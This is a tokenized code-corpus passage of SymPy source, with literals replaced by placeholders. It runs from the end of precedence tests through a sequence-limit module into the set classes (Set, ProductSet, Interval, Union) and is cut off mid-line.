( Integer ( <NUM_LIT:1> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Integer ( - <NUM_LIT:1> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Integer ( <NUM_LIT:10> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Rational ( <NUM_LIT:5> , <NUM_LIT:2> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Rational ( - <NUM_LIT:5> , <NUM_LIT:2> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Float ( <NUM_LIT:5> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Float ( - <NUM_LIT:5> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( oo ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( - oo ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Order ( ) : <EOL> assert precedence ( Order ( x ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Pow ( ) : <EOL> assert precedence ( x ** y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( - x ** y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x ** - y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Product ( ) : <EOL> assert precedence ( Product ( x , ( x , y , y + <NUM_LIT:1> ) ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Relational ( ) : <EOL> assert precedence ( Rel ( x + y , y , "<STR_LIT:<>" ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Sum ( ) : <EOL> assert precedence ( Sum ( x , ( x , y , y + <NUM_LIT:1> ) ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Symbol ( ) : <EOL> assert precedence ( x ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_And_Or ( ) : <EOL> assert precedence ( x & y ) > precedence ( x | y ) <EOL> assert precedence ( ~ y ) > precedence ( x & y ) <EOL> assert precedence ( x + y ) > precedence ( x | y ) <EOL> assert precedence ( x + y ) > precedence ( x & y ) <EOL> assert precedence ( x * y ) > precedence ( x | y ) <EOL> assert precedence ( x * y ) > precedence ( x & y ) <EOL> assert precedence ( ~ y ) > precedence ( x * y ) <EOL> assert precedence ( ~ y ) > precedence ( x - y ) <EOL> assert precedence ( x & y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x | y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( ~ y ) == PRECEDENCE [ "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core . sympify import sympify <EOL> from sympy . core . singleton import S <EOL> from sympy . core . add import Add <EOL> from sympy . core . function import PoleError <EOL> from sympy . series . limits import Limit <EOL> def difference_delta ( expr , n = None , step = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> expr = sympify ( expr ) <EOL> if n is None : <EOL> f = expr . free_symbols <EOL> if len ( f ) == <NUM_LIT:1> : <EOL> n = f . pop ( ) <EOL> elif len ( f ) == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % expr ) <EOL> step = sympify ( step ) <EOL> if step . is_number is False : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif step in [ S . Infinity , - S . Infinity ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if hasattr ( expr , '<STR_LIT>' ) : <EOL> result = expr . _eval_difference_delta ( n , step ) <EOL> if result : <EOL> return result <EOL> return expr . subs ( n , n + step ) - expr <EOL> def dominant ( expr , n ) : <EOL> """<STR_LIT>""" <EOL> terms = Add . make_args ( expr . expand ( func = True ) ) <EOL> term0 = terms [ - <NUM_LIT:1> ] <EOL> comp = [ term0 ] <EOL> for t in terms [ : - <NUM_LIT:1> ] : <EOL> e = ( term0 / t ) . combsimp ( ) <EOL> l = limit_seq ( e , n ) <EOL> if l is S . Zero : <EOL> term0 = t <EOL> comp = [ term0 ] <EOL> elif l is None : <EOL> return None <EOL> elif l not in [ S . Infinity , - S . Infinity ] : <EOL> comp . append ( t ) <EOL> if len ( comp ) > <NUM_LIT:1> : <EOL> return None <EOL> return term0 <EOL> def _limit_inf ( expr , n ) : <EOL> try : <EOL> return Limit ( expr , n , S . Infinity ) . doit ( deep = False , sequence = False ) <EOL> except ( NotImplementedError , PoleError ) : <EOL> return None <EOL> def limit_seq ( expr , n = None , trials = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> from sympy . concrete . summations import Sum <EOL> if n is None : <EOL> free = expr . free_symbols <EOL> if len ( free ) == <NUM_LIT:1> : <EOL> n = free . pop ( ) <EOL> elif not free : <EOL> return expr <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( expr ) ) <EOL> elif n not in expr . free_symbols : <EOL> return expr <EOL> for i in range ( trials ) : <EOL> if not expr . has ( Sum ) : <EOL> result = _limit_inf ( expr , n ) <EOL> if result is not None : <EOL> return result <EOL> num , den = expr . as_numer_denom ( ) <EOL> if not den . has ( n ) or not num . has ( n ) : <EOL> result = _limit_inf ( expr . doit ( ) , n ) <EOL> if result is not None : <EOL> return result <EOL> return None <EOL> num , den = ( difference_delta ( t . expand ( ) , n ) for t in [ num , den ] ) <EOL> expr = ( num / den ) . combsimp ( ) <EOL> if not expr . has ( Sum ) : <EOL> result = _limit_inf ( expr , n ) <EOL> if result is not None : <EOL> return result <EOL> num , den = expr . as_numer_denom ( ) <EOL> num = dominant ( num , n ) <EOL> if num is None : <EOL> return None <EOL> den = dominant ( den , n ) <EOL> if den is None : <EOL> return None <EOL> expr = ( num / den ) . combsimp ( ) </s>
<s> from __future__ import print_function , division <EOL> from itertools import product <EOL> from sympy . core . sympify import ( _sympify , sympify , converter , <EOL> SympifyError ) <EOL> from sympy . core . basic import Basic <EOL> from sympy . core . expr import Expr <EOL> from sympy . core . singleton import Singleton , S <EOL> from sympy . core . evalf import EvalfMixin <EOL> from sympy . core . numbers import Float <EOL> from sympy . core . compatibility import ( iterable , with_metaclass , <EOL> ordered , range , PY3 ) <EOL> from sympy . core . evaluate import global_evaluate <EOL> from sympy . core . function import FunctionClass <EOL> from sympy . core . mul import Mul <EOL> from sympy . core . relational import Eq <EOL> from sympy . core . symbol import Symbol , Dummy <EOL> from sympy . sets . contains import Contains <EOL> from sympy . utilities . misc import func_name , filldedent <EOL> from mpmath import mpi , mpf <EOL> from sympy . logic . boolalg import And , Or , Not , true , false <EOL> from sympy . utilities import subsets <EOL> class Set ( Basic ) : <EOL> """<STR_LIT>""" <EOL> is_number = False <EOL> is_iterable = False <EOL> is_interval = False <EOL> is_FiniteSet = False <EOL> is_Interval = False <EOL> is_ProductSet = False <EOL> is_Union = False <EOL> is_Intersection = None <EOL> is_EmptySet = None <EOL> is_UniversalSet = None <EOL> is_Complement = None <EOL> is_ComplexRegion = False <EOL> @ staticmethod <EOL> def _infimum_key ( expr ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> infimum = expr . inf <EOL> assert infimum . is_comparable <EOL> except ( NotImplementedError , <EOL> AttributeError , AssertionError , ValueError ) : <EOL> infimum = S . Infinity <EOL> return infimum <EOL> def union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return Union ( self , other ) <EOL> def intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return Intersection ( self , other ) <EOL> def intersection ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . intersect ( other ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_disjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . intersect ( other ) == S . EmptySet <EOL> def isdisjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_disjoint ( other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def complement ( self , universe ) : <EOL> """<STR_LIT>""" <EOL> return Complement ( universe , self ) <EOL> def _complement ( self , other ) : <EOL> if isinstance ( other , ProductSet ) : <EOL> switch_sets = ProductSet ( FiniteSet ( o , o - s ) for s , o in <EOL> zip ( self . sets , other . sets ) ) <EOL> product_sets = ( ProductSet ( * set ) for set in switch_sets ) <EOL> return Union ( p for p in product_sets if p != other ) <EOL> elif isinstance ( other , Interval ) : <EOL> if isinstance ( self , Interval ) or isinstance ( self , FiniteSet ) : <EOL> return Intersection ( other , self . complement ( S . Reals ) ) <EOL> elif isinstance ( other , Union ) : <EOL> return Union ( o - self for o in other . args ) <EOL> elif isinstance ( other , Complement ) : <EOL> return Complement ( other . args [ <NUM_LIT:0> ] , Union ( other . args [ <NUM_LIT:1> ] , self ) , evaluate = False ) <EOL> elif isinstance ( other , EmptySet ) : <EOL> return S . EmptySet <EOL> elif isinstance ( other , FiniteSet ) : <EOL> return FiniteSet ( * [ el for el in other if self . contains ( el ) != True ] ) <EOL> def symmetric_difference ( self , other ) : <EOL> return SymmetricDifference ( self , other ) <EOL> def _symmetric_difference ( self , other ) : <EOL> return Union ( Complement ( self , other ) , Complement ( other , self ) ) <EOL> @ property <EOL> def inf ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _inf <EOL> @ property <EOL> def _inf ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> @ property <EOL> def sup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sup <EOL> @ property <EOL> def _sup ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> def contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> other = sympify ( other , strict = True ) <EOL> ret = sympify ( self . _contains ( other ) ) <EOL> if ret is None : <EOL> ret = Contains ( other , self , evaluate = False ) <EOL> return ret <EOL> def _contains ( self , other ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % ( self , other ) ) <EOL> def is_subset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self . intersect ( other ) == self <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def issubset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_subset ( other ) <EOL> def is_proper_subset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self != other and self . is_subset ( other ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def is_superset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return other . is_subset ( self ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def issuperset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_superset ( other ) <EOL> def is_proper_superset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self != other and self . is_superset ( other ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def _eval_powerset ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' % self . func ) <EOL> def powerset ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _eval_powerset ( ) <EOL> @ property <EOL> def measure ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measure <EOL> @ property <EOL> def boundary ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _boundary <EOL> @ property <EOL> def is_open ( self ) : <EOL> if not Intersection ( self , self . boundary ) : <EOL> return True <EOL> return None <EOL> @ property <EOL> def is_closed ( self ) : <EOL> return self . boundary . is_subset ( self ) <EOL> @ property <EOL> def closure ( self ) : <EOL> return self + self . boundary <EOL> @ property <EOL> def interior ( self ) : <EOL> return self - self . boundary <EOL> @ property <EOL> def _boundary ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def _eval_imageset ( self , f ) : <EOL> from sympy . sets . fancysets import ImageSet <EOL> return ImageSet ( f , self ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> def __add__ ( self , other ) : <EOL> return self . union ( other ) <EOL> def __or__ ( self , other ) : <EOL> return self . union ( other ) <EOL> def __and__ ( self , other ) : <EOL> return self . intersect ( other ) <EOL> def __mul__ ( self , other ) : <EOL> return ProductSet ( self , other ) <EOL> def __xor__ ( self , other ) : <EOL> return SymmetricDifference ( self , other ) <EOL> def __pow__ ( self , exp ) : <EOL> if not sympify ( exp ) . is_Integer and exp >= <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % exp ) <EOL> return ProductSet ( [ self ] * exp ) <EOL> def __sub__ ( self , other ) : <EOL> return Complement ( self , other ) <EOL> def __contains__ ( self , other ) : <EOL> symb = sympify ( self . contains ( other ) ) <EOL> if not ( symb is S . true or symb is S . false ) : <EOL> raise TypeError ( '<STR_LIT>' % symb ) <EOL> return bool ( symb ) <EOL> class ProductSet ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_ProductSet = True <EOL> def __new__ ( cls , * sets , ** assumptions ) : <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_ProductSet : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> elif iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> sets = flatten ( list ( sets ) ) <EOL> if EmptySet ( ) in sets or len ( sets ) == <NUM_LIT:0> : <EOL> return EmptySet ( ) <EOL> if len ( sets ) == <NUM_LIT:1> : <EOL> return sets [ <NUM_LIT:0> ] <EOL> return Basic . __new__ ( cls , * sets , ** assumptions ) <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_ProductSet : <EOL> return <EOL> if len ( self . args ) != len ( other . args ) : <EOL> return false <EOL> return And ( * ( Eq ( x , y ) for x , y in zip ( self . args , other . args ) ) ) <EOL> def _contains ( self , element ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if len ( element ) != len ( self . args ) : <EOL> return false <EOL> except TypeError : <EOL> return false <EOL> return And ( * <EOL> [ set . contains ( item ) for set , item in zip ( self . sets , element ) ] ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not other . is_ProductSet : <EOL> return None <EOL> if len ( other . args ) != len ( self . args ) : <EOL> return S . EmptySet <EOL> return ProductSet ( a . intersect ( b ) <EOL> for a , b in zip ( self . sets , other . sets ) ) <EOL> def _union ( self , other ) : <EOL> if not other . is_ProductSet : <EOL> return None <EOL> if len ( other . args ) != len ( self . args ) : <EOL> return None <EOL> if self . args [ <NUM_LIT:0> ] == other . args [ <NUM_LIT:0> ] : <EOL> return self . args [ <NUM_LIT:0> ] * Union ( ProductSet ( self . args [ <NUM_LIT:1> : ] ) , <EOL> ProductSet ( other . args [ <NUM_LIT:1> : ] ) ) <EOL> if self . args [ - <NUM_LIT:1> ] == other . args [ - <NUM_LIT:1> ] : <EOL> return Union ( ProductSet ( self . args [ : - <NUM_LIT:1> ] ) , <EOL> ProductSet ( other . args [ : - <NUM_LIT:1> ] ) ) * self . args [ - <NUM_LIT:1> ] <EOL> return None <EOL> @ property <EOL> def sets ( self ) : <EOL> return self . args <EOL> @ property <EOL> def _boundary ( self ) : <EOL> return Union ( ProductSet ( b + b . boundary if i != j else b . boundary <EOL> for j , b in enumerate ( self . sets ) ) <EOL> for i , a in enumerate ( self . sets ) ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return all ( set . is_iterable for set in self . sets ) <EOL> def __iter__ ( self ) : <EOL> if self . is_iterable : <EOL> return product ( * self . sets ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> measure = <NUM_LIT:1> <EOL> for set in self . sets : <EOL> measure *= set . measure <EOL> return measure <EOL> def __len__ ( self ) : <EOL> return Mul ( * [ len ( s ) for s in self . args ] ) <EOL> class Interval ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Interval = True <EOL> def __new__ ( cls , start , end , left_open = False , right_open = False ) : <EOL> start = _sympify ( start ) <EOL> end = _sympify ( end ) <EOL> left_open = _sympify ( left_open ) <EOL> right_open = _sympify ( right_open ) <EOL> if not all ( isinstance ( a , ( type ( true ) , type ( false ) ) ) <EOL> for a in [ left_open , right_open ] ) : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( left_open , right_open ) ) <EOL> inftys = [ S . Infinity , S . NegativeInfinity ] <EOL> if not all ( i . is_real is not False or i in inftys for i in ( start , end ) ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if ( end < start ) == True : <EOL> return S . EmptySet <EOL> elif ( end - start ) . is_negative : <EOL> return S . EmptySet <EOL> if end == start and ( left_open or right_open ) : <EOL> return S . EmptySet <EOL> if end == start and not ( left_open or right_open ) : <EOL> return FiniteSet ( end ) <EOL> if start == S . NegativeInfinity : <EOL> left_open = true <EOL> if end == S . Infinity : <EOL> right_open = true <EOL> return Basic . __new__ ( cls , start , end , left_open , right_open ) <EOL> @ property <EOL> def start ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:0> ] <EOL> _inf = left = start <EOL> @ classmethod <EOL> def open ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , True , True ) <EOL> @ classmethod <EOL> def Lopen ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , True , False ) <EOL> @ classmethod <EOL> def Ropen ( cls , a , b ) : <EOL> """<STR_LIT>""" <EOL> return cls ( a , b , False , True ) <EOL> @ property <EOL> def end ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:1> ] <EOL> _sup = right = end <EOL> @ property <EOL> def left_open ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:2> ] <EOL> @ property <EOL> def right_open ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _args [ <NUM_LIT:3> ] <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not other . is_Interval : <EOL> return None <EOL> infty = S . NegativeInfinity , S . Infinity <EOL> if self == Interval ( * infty ) : <EOL> l , r = self . left , self . right <EOL> if l . is_real or l in infty or r . is_real or r in infty : <EOL> return other <EOL> if not self . _is_comparable ( other ) : <EOL> return None <EOL> empty = False <EOL> if self . start <= other . end and other . start <= self . end : <EOL> if self . start < other . start : <EOL> start = other . start <EOL> left_open = other . left_open <EOL> elif self . start > other . start : <EOL> start = self . start <EOL> left_open = self . left_open <EOL> else : <EOL> start = self . start <EOL> left_open = self . left_open or other . left_open <EOL> if self . end < other . end : <EOL> end = self . end <EOL> right_open = self . right_open <EOL> elif self . end > other . end : <EOL> end = other . end <EOL> right_open = other . right_open <EOL> else : <EOL> end = self . end <EOL> right_open = self . right_open or other . right_open <EOL> if end - start == <NUM_LIT:0> and ( left_open or right_open ) : <EOL> empty = True <EOL> else : <EOL> empty = True <EOL> if empty : <EOL> return S . EmptySet <EOL> return Interval ( start , end , left_open , right_open ) <EOL> def _complement ( self , other ) : <EOL> if other == S . Reals : <EOL> a = Interval ( S . NegativeInfinity , self . start , <EOL> True , not self . left_open ) <EOL> b = Interval ( self . end , S . Infinity , not self . right_open , True ) <EOL> return Union ( a , b ) <EOL> if isinstance ( other , FiniteSet ) : <EOL> nums = [ m for m in other . args if m . is_number ] <EOL> if nums == [ ] : <EOL> return None <EOL> return Set . _complement ( self , other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other . is_Interval and self . _is_comparable ( other ) : <EOL> from sympy . functions . elementary . miscellaneous import Min , Max <EOL> end = Min ( self . end , other . end ) <EOL> start = Max ( self . start , other . start ) <EOL> if ( end < start or <EOL> ( end == start and ( end not in self and end not in other ) ) ) : <EOL> return None <EOL> else : <EOL> start = Min ( self . start , other . start ) <EOL> end = Max ( self . end , other . end ) <EOL> left_open = ( ( self . start != start or self . left_open ) and <EOL> ( other . start != start or other . left_open ) ) <EOL> right_open = ( ( self . end != end or self . right_open ) and <EOL> ( other . end != end or other . right_open ) ) <EOL> return Interval ( start , end , left_open , right_open ) <EOL> if ( ( self . left_open and sympify ( other . contains ( self . start ) ) is S . true ) or <EOL> ( self . right_open and sympify ( other . contains ( self . end ) ) is S . true ) ) : <EOL> open_left = self . left_open and self . start not in other <EOL> open_right = self . right_open and self . end not in other <EOL> new_self = Interval ( self . start , self . end , open_left , open_right ) <EOL> return set ( ( new_self , other ) ) <EOL> return None <EOL> @ property <EOL> def _boundary ( self ) : <EOL> finite_points = [ p for p in ( self . start , self . end ) <EOL> if abs ( p ) != S . Infinity ] <EOL> return FiniteSet ( * finite_points ) <EOL> def _contains ( self , other ) : <EOL> if not isinstance ( other , Expr ) or ( <EOL> other is S . Infinity or <EOL> other is S . NegativeInfinity or <EOL> other is S . NaN or <EOL> other is S . ComplexInfinity ) or other . is_real is False : <EOL> return false <EOL> if self . start is S . NegativeInfinity and self . end is S . Infinity : <EOL> if not other . is_real is None : <EOL> return other . is_real <EOL> if self . left_open : <EOL> expr = other > self . start <EOL> else : <EOL> expr = other >= self . start <EOL> if self . right_open : <EOL> expr = And ( expr , other < self . end ) <EOL> else : <EOL> expr = And ( expr , other <= self . end ) <EOL> return _sympify ( expr ) <EOL> def _eval_imageset ( self , f ) : <EOL> from sympy . functions . elementary . miscellaneous import Min , Max <EOL> from sympy . solvers . solveset import solveset <EOL> from sympy . core . function import diff , Lambda <EOL> from sympy . series import limit <EOL> from sympy . calculus . singularities import singularities <EOL> expr = f . expr <EOL> if len ( expr . free_symbols ) > <NUM_LIT:1> or len ( f . variables ) != <NUM_LIT:1> : <EOL> return <EOL> var = f . variables [ <NUM_LIT:0> ] <EOL> if expr . is_Piecewise : <EOL> result = S . EmptySet <EOL> domain_set = self <EOL> for ( p_expr , p_cond ) in expr . args : <EOL> if p_cond is true : <EOL> intrvl = domain_set <EOL> else : <EOL> intrvl = p_cond . as_set ( ) <EOL> intrvl = Intersection ( domain_set , intrvl ) <EOL> if p_expr . is_Number : <EOL> image = FiniteSet ( p_expr ) <EOL> else : <EOL> image = imageset ( Lambda ( var , p_expr ) , intrvl ) <EOL> result = Union ( result , image ) <EOL> domain_set = Complement ( domain_set , intrvl ) <EOL> if domain_set . is_EmptySet : <EOL> break <EOL> return result <EOL> if not self . start . is_comparable or not self . end . is_comparable : <EOL> return <EOL> try : <EOL> sing = [ x for x in singularities ( expr , var ) <EOL> if x . is_real and x in self ] <EOL> except NotImplementedError : <EOL> return <EOL> if self . left_open : <EOL> _start = limit ( expr , var , self . start , dir = "<STR_LIT:+>" ) <EOL> elif self . start not in sing : <EOL> _start = f ( self . start ) <EOL> if self . right_open : <EOL> _end = limit ( expr , var , self . end , dir = "<STR_LIT:->" ) <EOL> elif self . end not in sing : <EOL> _end = f ( self . end ) <EOL> if len ( sing ) == <NUM_LIT:0> : <EOL> solns = list ( solveset ( diff ( expr , var ) , var ) ) <EOL> extr = [ _start , _end ] + [ f ( x ) for x in solns <EOL> if x . is_real and x in self ] <EOL> start , end = Min ( * extr ) , Max ( * extr ) <EOL> left_open , right_open = False , False <EOL> if _start <= _end : <EOL> if start == _start and start not in solns : <EOL> left_open = self . left_open <EOL> if end == _end and end not in solns : <EOL> right_open = self . right_open <EOL> else : <EOL> if start == _end and start not in solns : <EOL> left_open = self . right_open <EOL> if end == _start and end not in solns : <EOL> right_open = self . left_open <EOL> return Interval ( start , end , left_open , right_open ) <EOL> else : <EOL> return imageset ( f , Interval ( self . start , sing [ <NUM_LIT:0> ] , <EOL> self . left_open , True ) ) + Union ( * [ imageset ( f , Interval ( sing [ i ] , sing [ i + <NUM_LIT:1> ] , True , True ) ) <EOL> for i in range ( <NUM_LIT:0> , len ( sing ) - <NUM_LIT:1> ) ] ) + imageset ( f , Interval ( sing [ - <NUM_LIT:1> ] , self . end , True , self . right_open ) ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> return self . end - self . start <EOL> def to_mpi ( self , prec = <NUM_LIT> ) : <EOL> return mpi ( mpf ( self . start . _eval_evalf ( prec ) ) , <EOL> mpf ( self . end . _eval_evalf ( prec ) ) ) <EOL> def _eval_evalf ( self , prec ) : <EOL> return Interval ( self . left . _eval_evalf ( prec ) , <EOL> self . right . _eval_evalf ( prec ) , <EOL> left_open = self . left_open , right_open = self . right_open ) <EOL> def _is_comparable ( self , other ) : <EOL> is_comparable = self . start . is_comparable <EOL> is_comparable &= self . end . is_comparable <EOL> is_comparable &= other . start . is_comparable <EOL> is_comparable &= other . end . is_comparable <EOL> return is_comparable <EOL> @ property <EOL> def is_left_unbounded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . left is S . NegativeInfinity or self . left == Float ( "<STR_LIT>" ) <EOL> @ property <EOL> def is_right_unbounded ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . right is S . Infinity or self . right == Float ( "<STR_LIT>" ) <EOL> def as_relational ( self , x ) : <EOL> """<STR_LIT>""" <EOL> x = sympify ( x ) <EOL> if self . right_open : <EOL> right = x < self . end <EOL> else : <EOL> right = x <= self . end <EOL> if self . left_open : <EOL> left = self . start < x <EOL> else : <EOL> left = self . start <= x <EOL> return And ( left , right ) <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_Interval : <EOL> if ( other . is_Union or other . is_Complement or <EOL> other . is_Intersection or other . is_ProductSet ) : <EOL> return <EOL> return false <EOL> return And ( Eq ( self . left , other . left ) , <EOL> Eq ( self . right , other . right ) , <EOL> self . left_open == other . left_open , <EOL> self . right_open == other . right_open ) <EOL> class Union ( Set , EvalfMixin ) : <EOL> """<STR_LIT>""" <EOL> is_Union = True <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> evaluate = kwargs . get ( '<STR_LIT>' , global_evaluate [ <NUM_LIT:0> ] ) <EOL> args = list ( args ) <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_Union : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> if iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> args = flatten ( args ) <EOL> if len ( args ) == <NUM_LIT:0> : <EOL> return S . EmptySet <EOL> if evaluate : <EOL> return Union . reduce ( args ) <EOL> args = list ( ordered ( args , Set . _infimum_key ) ) <EOL> return Basic . __new__ ( cls , * args ) <EOL> @ staticmethod <EOL> def reduce ( args ) : <EOL> """<STR_LIT>""" <EOL> finite_sets = [ x for x in args if x . is_FiniteSet ] <EOL> if len ( finite_sets ) > <NUM_LIT:1> : <EOL> a = ( x for set in finite_sets for x in set ) <EOL> finite_set = FiniteSet ( * a ) <EOL> args = [ finite_set ] + [ x for x in args if not x . is_FiniteSet ] <EOL> args = set ( args ) <EOL> new_args = True <EOL> while ( new_args ) : <EOL> for s in args : <EOL> new_args = False <EOL> for t in args - set ( ( s , ) ) : <EOL> new_set = s . _union ( t ) <EOL> if new_set is not None : <EOL> if not isinstance ( new_set , set ) : <EOL> new_set = set ( ( new_set , ) ) <EOL> new_args = ( args - set ( ( s , t ) ) ) . union ( new_set ) <EOL> break <EOL> if new_args : <EOL> args = new_args <EOL> break <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return args . pop ( ) <EOL> else : <EOL> return Union ( args , evaluate = False ) <EOL> def _complement ( self , universe ) : <EOL> return Intersection ( s . complement ( universe ) for s in self . args ) <EOL> @ property <EOL> def _inf ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Min <EOL> return Min ( * [ set . inf for set in self . args ] ) <EOL> @ property <EOL> def _sup ( self ) : <EOL> from sympy . functions . elementary . miscellaneous import Max <EOL> return Max ( * [ set . sup for set in self . args ] ) <EOL> def _contains ( self , other ) : <EOL> return Or ( * [ set . contains ( other ) for set in self . args ] ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> sets = [ ( FiniteSet ( s ) , s ) for s in self . args ] <EOL> measure = <NUM_LIT:0> <EOL> parity = <NUM_LIT:1> <EOL> while sets : <EOL> measure += parity * sum ( inter . measure for sos , inter in sets ) <EOL> sets = ( ( sos + FiniteSet ( newset ) , newset . intersect ( intersection ) ) <EOL> for sos , intersection in sets for newset in self . args <EOL> if newset not in sos ) <EOL> sets = [ ( sos , inter ) for sos , inter in sets if inter . measure != <NUM_LIT:0> ] <EOL> sos_list = [ ] <EOL> sets_list = [ ] <EOL> for set in sets : <EOL> if set [ <NUM_LIT:0> ] in sos_list : <EOL> continue <EOL> else : <EOL> sos_list . append ( set [ <NUM_LIT:0> ] ) <EOL> sets_list . append ( set ) <EOL> sets = sets_list <EOL> parity *= - <NUM_LIT:1> <EOL> return measure <EOL> @ property <EOL> def _boundary ( self ) : <EOL> def boundary_of_set ( i ) : <EOL> """<STR_LIT>""" <EOL> b = self . args [ i ] . boundary <EOL> for j , a in enumerate ( self . args ) : <EOL> if j != i : <EOL> b = b - a . interior <EOL> return b <EOL> return Union ( map ( boundary_of_set , range ( len ( self . args ) ) ) ) <EOL> def _eval_imageset ( self , f ) : <EOL> return Union ( imageset ( f , arg ) for arg in self . args ) <EOL> def as_relational ( self , symbol ) : <EOL> """<STR_LIT>""" <EOL> return Or ( * [ set . as_relational ( symbol ) for set in self . args ] ) <EOL> @ property <EOL> def is_iterable ( self ) : <EOL> return all ( arg . is_iterable for arg in self . args ) <EOL> def _eval_evalf ( self , prec ) : <EOL> try : <EOL> return Union ( set . _eval_evalf 